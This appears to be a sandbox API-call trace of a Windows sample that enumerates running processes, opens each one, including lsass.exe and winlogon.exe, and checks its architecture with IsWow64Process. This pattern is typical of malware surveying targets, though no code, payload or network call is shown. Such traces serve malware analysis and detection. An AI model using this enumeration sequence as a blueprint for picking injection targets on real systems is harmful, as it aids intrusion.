	[0088.103] wsprintfW (in: param_1=0x433698, param_2="SESSION:\\\\%s\\%s\\%d" | out: param_1="SESSION:\\\\X2VS1CUM\\Nd9E1FYi\\1") returned 29
	[0088.103] CloseHandle (hObject=0x20c) returned 1
	[0088.103] CloseHandle (hObject=0x1ec) returned 1
	[0088.103] GetCurrentProcessId () returned 0x934
	[0088.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x406260, lpParameter=0x64fdd0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec
	[0088.103] CloseHandle (hObject=0x1ec) returned 1
	[0088.104] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4066b0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ec
	[0088.104] CloseHandle (hObject=0x1ec) returned 1
	[0088.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x164f0) returned 0xc0000004
	[0088.105] VirtualAlloc (lpAddress=0x0, dwSize=0x165f0, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0088.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x165f0, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0088.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0088.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0088.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0088.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0088.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0088.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0088.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0088.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0088.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0088.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0088.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0088.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0088.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0088.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0088.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ad08, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0088.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0088.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0088.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0088.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0088.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0088.141] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0088.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0088.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0088.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0088.142] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.142] CloseHandle (hObject=0x20c) returned 1
	[0088.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0088.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0088.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0088.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658de8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0088.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0088.143] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.143] CloseHandle (hObject=0x20c) returned 1
	[0088.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0088.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0088.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0088.143] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.143] CloseHandle (hObject=0x20c) returned 1
	[0088.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0088.144] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.144] CloseHandle (hObject=0x20c) returned 1
	[0088.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0088.144] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.144] CloseHandle (hObject=0x20c) returned 1
	[0088.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0088.144] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.144] CloseHandle (hObject=0x20c) returned 1
	[0088.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0088.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0088.144] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.144] CloseHandle (hObject=0x20c) returned 1
	[0088.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0088.144] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.144] CloseHandle (hObject=0x20c) returned 1
	[0088.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0088.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0088.145] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.145] CloseHandle (hObject=0x20c) returned 1
	[0088.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0088.145] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.145] CloseHandle (hObject=0x20c) returned 1
	[0088.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0088.145] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.145] CloseHandle (hObject=0x20c) returned 1
	[0088.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658dc8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0088.145] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0088.145] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.145] CloseHandle (hObject=0x20c) returned 1
	[0088.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0088.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0088.146] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.146] CloseHandle (hObject=0x20c) returned 1
	[0088.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65add8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0088.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0088.146] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.146] CloseHandle (hObject=0x20c) returned 1
	[0088.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0088.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0088.146] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.146] CloseHandle (hObject=0x20c) returned 1
	[0088.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658a10, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0088.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0088.146] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.146] CloseHandle (hObject=0x20c) returned 1
	[0088.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658f08, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0088.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0088.146] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.146] CloseHandle (hObject=0x20c) returned 1
	[0088.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0088.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0088.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.147] CloseHandle (hObject=0x20c) returned 1
	[0088.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0088.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0088.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.147] CloseHandle (hObject=0x20c) returned 1
	[0088.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x6590e8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0088.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0088.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.147] CloseHandle (hObject=0x20c) returned 1
	[0088.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658d88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0088.147] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0088.147] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.147] CloseHandle (hObject=0x20c) returned 1
	[0088.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0088.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.148] CloseHandle (hObject=0x20c) returned 1
	[0088.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0088.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0088.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.148] CloseHandle (hObject=0x20c) returned 1
	[0088.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x6589c0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0088.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0088.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.148] CloseHandle (hObject=0x20c) returned 1
	[0088.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0088.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0088.148] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.148] CloseHandle (hObject=0x20c) returned 1
	[0088.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0088.148] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0088.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.149] CloseHandle (hObject=0x20c) returned 1
	[0088.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658e68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0088.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0088.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.149] CloseHandle (hObject=0x20c) returned 1
	[0088.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0088.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0088.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.149] CloseHandle (hObject=0x20c) returned 1
	[0088.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658e68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0088.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0088.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.149] CloseHandle (hObject=0x20c) returned 1
	[0088.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0088.149] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0088.149] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0088.149] CloseHandle (hObject=0x20c) returned 1
